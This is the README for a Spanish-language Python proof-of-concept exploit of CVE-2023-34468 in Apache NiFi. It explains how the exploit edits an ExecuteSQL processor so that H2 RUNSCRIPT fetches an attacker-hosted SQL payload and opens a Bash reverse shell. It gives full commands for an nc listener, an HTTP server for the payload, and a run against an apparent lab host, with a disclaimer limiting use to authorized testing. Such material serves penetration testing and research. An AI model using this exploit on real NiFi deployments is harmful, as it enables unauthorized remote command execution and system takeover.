
CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC
PoC corto en Python para abusar de un procesador ExecuteSQL editable de Apache NiFi con una carga útil RUNSCRIPT de H2 para desencadenar la ejecución remota de comandos a través de una reverse shell de Bash.
Solo para pruebas autorizadas e investigación. No lo utilices contra sistemas que no poseas o para los que no tengas permiso explícito de prueba.
ExecuteSQL processor update -> H2 RUNSCRIPT fetch -> Bash reverse shell -> processor restore
--processor-id manualmente.rce.sql que define y llama a un alias de ejecución de shell respaldado por Java.nc y servidor HTTP.rce.sql mediante H2 .RUNSCRIPT



git clone https://github.com/ozcanpng/CVE-2023-34468.git
cd CVE-2023-34468
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
Terminal 1:
rlwrap nc -lvnp 4444
Terminal 2, desde el directorio de este repositorio:
python3 -m http.server 8000
Terminal 3:
python3 CVE-2023-34468.py --url http://flow.helix.htb --lhost 10.10.16.53 --lport 4444
Para selección manual del procesador:
python3 CVE-2023-34468.py --url http://flow.helix.htb --processor-id <UUID> --lhost 10.10.16.53 --lport 4444
| Product | Affected Version | Access Required | Impact |
|---|---|---|---|
| Apache NiFi | Implementaciones afectadas por CVE-2023-34468 que usan el comportamiento editable de ExecuteSQL/H2 | Capacidad de alcanzar y modificar el procesador NiFi objetivo a través de la API | Ejecución remota de comandos |
rce.sql generado es ignorado por git y debe servirse desde el directorio del repositorio con python3 -m http.server.--processor-id.ozcanpng — github.com/ozcanpng — ozcanpng.dev